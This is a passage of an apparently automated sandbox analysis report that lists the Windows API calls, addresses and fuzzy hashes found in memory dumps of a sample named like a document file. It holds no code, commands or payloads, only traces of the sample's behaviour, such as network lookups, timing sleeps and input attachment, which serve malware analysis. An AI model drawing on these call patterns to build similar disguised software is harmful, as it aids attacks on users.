                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: lstrcmpilstrcpylstrlen
                                                        • String ID: cdecl
                                                        • API String ID: 4031866154-3896280584
                                                        • Opcode ID: da12ec30330ed4864f0711c16594a0354551cdd4ef84337705c8a439aca62048
                                                        • Instruction ID: e3bffe67f320404a05572c8f225bb1f968e720b06608c0284424feb52406ee85
                                                        • Opcode Fuzzy Hash: da12ec30330ed4864f0711c16594a0354551cdd4ef84337705c8a439aca62048
                                                        • Instruction Fuzzy Hash: FA110636100345EFDB219F34C859EBA77B8FF45351B80802AF806CB251EB75A84587A0
                                                        APIs
                                                        • _free.LIBCMT ref: 00743D65
                                                          • Part of subcall function 007345EC: __FF_MSGBANNER.LIBCMT ref: 00734603
                                                          • Part of subcall function 007345EC: __NMSG_WRITE.LIBCMT ref: 0073460A
                                                          • Part of subcall function 007345EC: RtlAllocateHeap.NTDLL(01760000,00000000,00000001), ref: 0073462F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeap_free
                                                        • String ID:
                                                        • API String ID: 614378929-0
                                                        • Opcode ID: 28f784663aa93e8fa55060732c15e67db809940b79688bd0da387012da8a7537
                                                        • Instruction ID: 6e723a3f5f224d383fdf9b32f67bcff27b6854897eae3ecba18c8ce3946991dc
                                                        • Opcode Fuzzy Hash: 28f784663aa93e8fa55060732c15e67db809940b79688bd0da387012da8a7537
                                                        • Instruction Fuzzy Hash: 61117332E05711EBEB353F74AC497AA3B98AF00361F108526F94D9A193DF3C9E418A95
                                                        APIs
                                                        • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 0075715C
                                                        • _memset.LIBCMT ref: 0075717D
                                                        • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 007571CF
                                                        • CloseHandle.KERNEL32(00000000), ref: 007571D8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CloseControlCreateDeviceFileHandle_memset
                                                        • String ID:
                                                        • API String ID: 1157408455-0
                                                        • Opcode ID: fa0a4979291ab12de4cca4587f13061b4a92f4e6d25f573731eda3b2fffe3d83
                                                        • Instruction ID: e1be11d7dde23af581ef969e6b728cb21516fbdff501252465dcca4a00a47bef
                                                        • Opcode Fuzzy Hash: fa0a4979291ab12de4cca4587f13061b4a92f4e6d25f573731eda3b2fffe3d83
                                                        • Instruction Fuzzy Hash: 2F11CA7290122C7AE7305B65AC4DFEBBA7CEF45760F10419AF904E71D0D2744E84CBA8
                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 007513EE
                                                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00751409
                                                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0075141F
                                                        • FreeLibrary.KERNEL32(?), ref: 00751474
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                        • String ID:
                                                        • API String ID: 3137044355-0
                                                        • Opcode ID: 2f90579c7fcddc1e68b0a2b79ad636fa199ec190e5771edc54c0004b26912205
                                                        • Instruction ID: 4e68de9f04b66a55aa5e7d10b2a9401a5fab416b9e539afbc434c57002673d45
                                                        • Opcode Fuzzy Hash: 2f90579c7fcddc1e68b0a2b79ad636fa199ec190e5771edc54c0004b26912205
                                                        • Instruction Fuzzy Hash: D721A271500249EBEB209F90DC88BDABBB8EF00747F40886AA91297410D7B8E949DF51
                                                        APIs
                                                          • Part of subcall function 0072F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0075AEA5,?,?,00000000,00000008), ref: 0072F282
                                                          • Part of subcall function 0072F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0075AEA5,?,?,00000000,00000008), ref: 0072F2A6
                                                        • gethostbyname.WS2_32(?), ref: 007692F0
                                                        • WSAGetLastError.WS2_32(00000000), ref: 007692FB
                                                        • _memmove.LIBCMT ref: 00769328
                                                        • inet_ntoa.WS2_32(?), ref: 00769333
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                        • String ID:
                                                        • API String ID: 1504782959-0
                                                        • Opcode ID: 932b4b2a4bfbe39bcbb78f1a3166a07dd45ee2c97f706fb962f66a9168e251bc
                                                        • Instruction ID: c367410420b830a97c3704ce481483ae1c48f3bbfaf81ff2aeb9376f468bb5fc
                                                        • Opcode Fuzzy Hash: 932b4b2a4bfbe39bcbb78f1a3166a07dd45ee2c97f706fb962f66a9168e251bc
                                                        • Instruction Fuzzy Hash: 66114C76500109EFCB14EFA4CD5ACEE77B9AF483117108025F506A72A2DB38EE04CBA1
                                                        APIs
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0074C285
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0074C297
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0074C2AD
                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0074C2C8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID:
                                                        • API String ID: 3850602802-0
                                                        • Opcode ID: b1ef17862e45c2153ff5ab287a0181243c1a702c9e14405122c45a19b006976d
                                                        • Instruction ID: 5ddb4c699ca8def4bd512126dafcc6cc6db056437a2cd536b3433d7b9fb72e5d
                                                        • Opcode Fuzzy Hash: b1ef17862e45c2153ff5ab287a0181243c1a702c9e14405122c45a19b006976d
                                                        • Instruction Fuzzy Hash: 9B11187A941218FFDB11DFD8C885E9DBBB4FB08750F204091EA04B7294D7B1AE10DB94
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 00757C6C
                                                        • MessageBoxW.USER32(?,?,?,?), ref: 00757C9F
                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00757CB5
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00757CBC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                        • String ID:
                                                        • API String ID: 2880819207-0
                                                        • Opcode ID: dcbb413007674b22e5a5e08fd5ab650a874b1e5dcb6b6c5ea85d6c64ff5193af
                                                        • Instruction ID: c184ad39b3ad40c9f79d65224c8b91876596d1cd4b50ae994e8916758d57498f
                                                        • Opcode Fuzzy Hash: dcbb413007674b22e5a5e08fd5ab650a874b1e5dcb6b6c5ea85d6c64ff5193af
                                                        • Instruction Fuzzy Hash: 1E112B72A05248BFD7519FACEC08AEA7FBD9B04325F148216F925D3291D6BC8D08C775
                                                        APIs
                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0072C657
                                                        • GetStockObject.GDI32(00000011), ref: 0072C66B
                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 0072C675
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CreateMessageObjectSendStockWindow
                                                        • String ID:
                                                        • API String ID: 3970641297-0
                                                        • Opcode ID: eaeba0646df780670558588c4779085d676ad99a3c655b257ffd6b9879c58950
                                                        • Instruction ID: 0c484d2ec497bd0837b7d26c148118fd739e297a5de20258e250c5962ff80ae2
                                                        • Opcode Fuzzy Hash: eaeba0646df780670558588c4779085d676ad99a3c655b257ffd6b9879c58950
                                                        • Instruction Fuzzy Hash: F411C072501659BFDF128FA0EC45EEEBB69FF183A4F054212FA0452020C73ADC60EBA4
                                                        APIs
                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0075354D,?,007545D5,?,00008000), ref: 007549EE
                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0075354D,?,007545D5,?,00008000), ref: 00754A13
                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0075354D,?,007545D5,?,00008000), ref: 00754A1D
                                                        • Sleep.KERNEL32(?,?,?,?,?,?,?,0075354D,?,007545D5,?,00008000), ref: 00754A50
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CounterPerformanceQuerySleep
                                                        • String ID:
                                                        • API String ID: 2875609808-0
                                                        • Opcode ID: 76d027ef8a1b09908459926d4717f2c6a7e54c84a49adc23b78949421a0b6a2f
                                                        • Instruction ID: 2fa6de9eb6b45b487632d926074a5d101ccbd6fb63123dc73f2e4f3348285c3c
                                                        • Opcode Fuzzy Hash: 76d027ef8a1b09908459926d4717f2c6a7e54c84a49adc23b78949421a0b6a2f
                                                        • Instruction Fuzzy Hash: CE113C71D4052CDBCF10EFA5D989AEEBB78FF08716F018056ED41B2240CB789995CB99
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                        • String ID:
                                                        • API String ID: 3016257755-0
                                                        • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                        • Instruction ID: 5328dba804a681ee7d0813136f8fb23ad11e15edb4ac99737edd7803702a6866
                                                        • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                        • Instruction Fuzzy Hash: C6014B7240064EFBCF125E84DC45CEE3F62FB19350B588815FA1859032D33ACAB1AB92
                                                        APIs
                                                          • Part of subcall function 0073869D: __getptd_noexit.LIBCMT ref: 0073869E
                                                        • __lock.LIBCMT ref: 0073811F
                                                        • InterlockedDecrement.KERNEL32(?), ref: 0073813C
                                                        • _free.LIBCMT ref: 0073814F
                                                        • InterlockedIncrement.KERNEL32(017739F0), ref: 00738167
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                        • String ID:
                                                        • API String ID: 2704283638-0
                                                        • Opcode ID: 48a1f063176da4dd47060baacd40e0a7ff34c0986d566138b7782dadbfc7a90d
                                                        • Instruction ID: 12a2e04f04718182c26f7759da545969b9db3939193c82663c1831ae0d2227c3
                                                        • Opcode Fuzzy Hash: 48a1f063176da4dd47060baacd40e0a7ff34c0986d566138b7782dadbfc7a90d
                                                        • Instruction Fuzzy Hash: 84016D71901729EBEBA5AF74980AB99B360BF04715F04411DF81467293CF3C6942CBD7
                                                        APIs
                                                        • __lock.LIBCMT ref: 00738768
                                                          • Part of subcall function 00738984: __mtinitlocknum.LIBCMT ref: 00738996
                                                          • Part of subcall function 00738984: RtlEnterCriticalSection.NTDLL(00730127), ref: 007389AF
                                                        • InterlockedIncrement.KERNEL32(DC840F00), ref: 00738775
                                                        • __lock.LIBCMT ref: 00738789
                                                        • ___addlocaleref.LIBCMT ref: 007387A7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                        • String ID:
                                                        • API String ID: 1687444384-0
                                                        • Opcode ID: 0a2984297bcd69883696b5d4decb655e82770d0c9a1f2650be634c9535382ccd
                                                        • Instruction ID: 24d9f1a8e48ccf9cff8fc04c60899257b8e51f6cdb4c4ffed84f614de366a93c
                                                        • Opcode Fuzzy Hash: 0a2984297bcd69883696b5d4decb655e82770d0c9a1f2650be634c9535382ccd
                                                        • Instruction Fuzzy Hash: 9F016DB1400B00EFE760EFB5D809759F7F0AF40725F20890EF099972A2CB78A640CB02
                                                        APIs
                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 00759C7F
                                                          • Part of subcall function 0075AD14: _memset.LIBCMT ref: 0075AD49
                                                        • _memmove.LIBCMT ref: 00759CA2
                                                        • _memset.LIBCMT ref: 00759CAF
                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 00759CBF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection_memset$EnterLeave_memmove
                                                        • String ID:
                                                        • API String ID: 48991266-0
                                                        • Opcode ID: f4227cbb82420f7f51c94ccbe0307d43b2e3a3328583be32a93988be9d98a58e
                                                        • Instruction ID: 1ab14ac3b8d59fa422e61a935c0023abcb7a211546a5f9cb4acdbf1f6a68f60b
                                                        • Opcode Fuzzy Hash: f4227cbb82420f7f51c94ccbe0307d43b2e3a3328583be32a93988be9d98a58e
                                                        • Instruction Fuzzy Hash: 6EF03076201100ABCB016F54EC89A99BB29EF45311F08C062FE085E217C779E815DBF5
                                                        APIs
                                                          • Part of subcall function 0072B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0072B5EB
                                                          • Part of subcall function 0072B58B: SelectObject.GDI32(?,00000000), ref: 0072B5FA
                                                          • Part of subcall function 0072B58B: BeginPath.GDI32(?), ref: 0072B611
                                                          • Part of subcall function 0072B58B: SelectObject.GDI32(?,00000000), ref: 0072B63B
                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0077E860
                                                        • LineTo.GDI32(00000000,?,?), ref: 0077E86D
                                                        • EndPath.GDI32(00000000), ref: 0077E87D
                                                        • StrokePath.GDI32(00000000), ref: 0077E88B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                        • String ID:
                                                        • API String ID: 1539411459-0
                                                        • Opcode ID: e12f8dbff93f623b8efb350342c95c285c529ea6bd87a252ff30f074ba7a06ec
                                                        • Instruction ID: c06400ed50fdf15aae20352c7805c1dbfd782977faca6ea4f30b793293313b8b
                                                        • Opcode Fuzzy Hash: e12f8dbff93f623b8efb350342c95c285c529ea6bd87a252ff30f074ba7a06ec
                                                        • Instruction Fuzzy Hash: C6F08931001259B7DB225F54AC0EFCE3F596F09311F04C142FA15250E1877D5952DF99
                                                        APIs
                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0074D640
                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 0074D653
                                                        • GetCurrentThreadId.KERNEL32 ref: 0074D65A
                                                        • AttachThreadInput.USER32(00000000), ref: 0074D661
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                        • String ID:
                                                        • API String ID: 2710830443-0
                                                        • Opcode ID: b1be8043f5515a72265158bd8b4970e7bd3c5e7bd62dd0e9e478eb69a767ed1a
                                                        • Instruction ID: 3e7e1d52ee89bbc3808590491d5e0b325026eee95323b76f25772f4ccf4fd2c9
                                                        • Opcode Fuzzy Hash: b1be8043f5515a72265158bd8b4970e7bd3c5e7bd62dd0e9e478eb69a767ed1a
                                                        • Instruction Fuzzy Hash: 1FE03932141228BADB301BA29C0DEDB7F2CEF117E1F008012B54C85060CB799D81CBA8
                                                        APIs
                                                        • GetSysColor.USER32(00000008), ref: 0072B0C5
                                                        • SetTextColor.GDI32(?,000000FF), ref: 0072B0CF
                                                        • SetBkMode.GDI32(?,00000001), ref: 0072B0E4
                                                        • GetStockObject.GDI32(00000005), ref: 0072B0EC
                                                        • GetWindowDC.USER32(?,00000000), ref: 0078ECFA
                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 0078ED07
                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 0078ED20
                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 0078ED39
                                                        • GetPixel.GDI32(00000000,?,?), ref: 0078ED59
                                                        • ReleaseDC.USER32(?,00000000), ref: 0078ED64
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
